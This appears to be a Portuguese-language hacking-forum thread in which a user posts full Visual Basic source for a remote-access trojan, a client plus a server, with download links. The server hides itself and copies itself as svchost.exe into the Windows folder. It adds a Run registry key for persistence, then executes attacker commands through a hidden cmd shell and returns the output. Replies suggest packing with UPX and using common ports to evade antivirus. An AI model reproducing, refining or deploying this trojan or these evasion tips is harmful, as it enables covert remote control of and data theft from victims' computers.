[Source] Training hacker trojan by eu

[branco]

cliente :

Code Select Expand

Private Sub Command1_Click()
List1.Clear
If Command1.Caption = "&Conectar" Then
If Text1 = "" Then
Text1 = InputBox("Por favor digite o endereço de IP", "School Hacker", "IP")
If Text1 = "" Then
MsgBox "Para se conectar, precisa informa o IP do servidor, ex : xxx.xxx.xxx.xxx", vbExclamation, "Aviso"
Text1.SetFocus
Exit Sub
End If
End If
With sock
.Close
.LocalPort = 0
.RemotePort = 1111
.RemoteHost = Text1
.Connect
Me.MousePointer = vbHourglass
Do While .State <> sckConnected: DoEvents
If .State = sckError Then
MsgBox "Não foi possivel concluir a conecção", vbExclamation, "Aviso"
Text1.Text = ""
Text1.SetFocus
Exit Do
End If
Loop
Me.MousePointer = vbNormal
If .State = sckConnected Then
Text2.Text = ""
Text2.SetFocus
End If
End With
Else
Text1.Text = ""
sock.Close
Command2.Enabled = False
Command1.Caption = "&Conectar"
End If
End Sub
Private Sub Command2_Click()
If Text2 = "cls" Then
List1.Clear
Text2.Text = ""
Text2.SetFocus
Exit Sub
End If
If Text2 = "" Then
List1.AddItem "Digite o comando que deseja enviar"
Text2.SetFocus
Exit Sub
End If
If sock.State = 7 Then
sock.SendData Text2
List1.AddItem "[ " & Text2 & " ] enviado com sucesso !"
Text2.Text = ""
Text2.SetFocus
End If
If sock.State <> 7 Then
MsgBox "Você não está conectado !", vbExclamation, "Aviso"
Text2.Text = ""
Command1_Click
Text1.SetFocus
End If
End Sub
Private Sub Form_Load()
sock1.Close
sock1.LocalPort = 1212
sock1.Listen
Command2.Enabled = False
End Sub
Private Sub Label1_Click()
Static Ie As New InternetExplorer
Set Ie = New InternetExplorer
Ie.Navigate "www.darkers.com.br"
Ie.Visible = True
End Sub
Private Sub mnusoftware_Click()
Form2.Show
End Sub
Private Sub mnuUsar_Click()
Form3.Show
End Sub
Private Sub sock_connect()
Command1.Caption = "&Desconectar"
Command2.Enabled = True
MsgBox "Conecção concluida com sucesso, Have fun", vbInformation, "Status"
End Sub
Private Sub sock1_connectionrequest(ByVal requestID As Long)
sock1.Close
sock1.Accept requestID
End Sub
Private Sub sock1_dataarrival(ByVal rox As Long)
Dim cmd$
cmd = String(rox, 32)
sock1.GetData cmd
List1.AddItem cmd
End Sub
server :

Code Select Expand

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Sub Form_Load()
Me.Hide
App.TaskVisible = False
Dim Reg As Object
Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & "explore", Environ("WINDIR") & "\" & "svchost.exe"
If App.EXEName <> "svchost" Then
FileCopy App.EXEName & ".exe", Environ("WINDIR") & "\svchost.exe"
End If
With sock
.Close
.LocalPort = 1111
.Listen
End With
End Sub
Private Sub sock_ConnectionRequest(ByVal requestID As Long)
sock.Close
sock.Accept requestID
sock1.Close
sock1.RemoteHost = sock.RemoteHostIP
sock1.RemotePort = 1212
sock1.Connect
End Sub
Private Sub sock_close()
Form_Load
End Sub
Private Sub sock_dataarrival(ByVal rox As Long)
Dim linha As String
Dim cmd$
cmd = String(rox, 32)
sock.GetData cmd
If cmd = "resp" Then
arq = FreeFile
Open "d:\windows\log.txt" For Input As arq
Do Until EOF(arq): DoEvents
DoEvents
Line Input #arq, linha
DoEvents
sock1.SendData linha
DoEvents
Loop: DoEvents
End If
If cmd = "opendrivecd" Then
Call mciSendString("Set CDAudio Door Open Wait", 0&, 0&, 0&)
End If
If cmd = "closedrivecd" Then
Call mciSendString("Set CDAudio Door Closed Wait", 0&, 0&, 0&)
End If
Shell Environ("ComSpec") & " /c " & cmd & ">" & Environ("windir") & "\log.txt", vbHide
End Sub
]

[branco]

a é, o trojan fico assim :



fis mais pro pessoal do invasao mesmo, algumas funções :

opendrivecd
que fais o drive abrir

closedrivecd
que fais o drive fechar

cls
limpa o listbox do trojan

download : http://rapidshare.de/files/22061498/Training.rar.html

t+

[locator.dll]

Parabéns!

Ponto!

vlw

locator.dll

[caesar2k]

seria interessante você usar o API OemToAnsi() para mostrar as letras acentuadas corretamente

[Sladrak]

Axei q ninguem mexia com vb aki...
Nunk vi ninguem postando nada... xD

Vlw ae... Vai me ajudar muito...
Estudando vb...

O Nod detectou ele o.O

[branco]

novo dl : http://rapidshare.de/files/22121777/tra ... r.rar.html
tinha me esquecido de modificar o open "d:\windows\log.txt", na verdade só iria funcionar em quem tem unidade d:
então no novo download coloquei "Open Environ("WINDIR") & "\log.txt" For Input As arq" que funciona em qualquer unidade
valew ae pelo ponto e caesar2k, vlw pela dica, ainda não vi sobre essa api, mas talvez nos meus proximos sources vcs iram encontrala, t+

[branco]

Axei q ninguem mexia com vb aki...
Nunk vi ninguem postando nada... xD

Vlw ae... Vai me ajudar muito...
Estudando vb...

O Nod detectou ele o.O

"malz flood"

é, hoje em dia esses trojans simples assim, até quando estão sendo fabricados já são detectados 
ta facil se prefenir tambem, firewall avisa que tem porta sendo aberta e tal, fico mais pra estudos mesmo, se precisa de ajuda só manda mp, t+

[Anonymous]

mas se o cara colocar numa porta aberta, tipow 80, 25, 20 21, alguem ja tentou? daí fica mais diificil de detectar

para o AV n detectar uma dica eh compactar com upx ou outros..

flw!

[vuln]

Parabéns, um bom código. Mais uma vez, mostra que códigos simples podem resultar em grandes projetos. A respeito da idéia do dudeabot eu acho que não iria funcionar. Eu irei me informar, mas acho que as portas que tem uma conexão específica são configuradas para estabelecer essas conexões. Um bom exemplo é FTP e SSH (21 e 22). Ambas são portas que recebem dados protocolados como TCP IP. Se você for receber conexões de pacotes UDP acho que irá dar um probleminha.

Vou pesquisar depois coloco mais detalhes, até mais.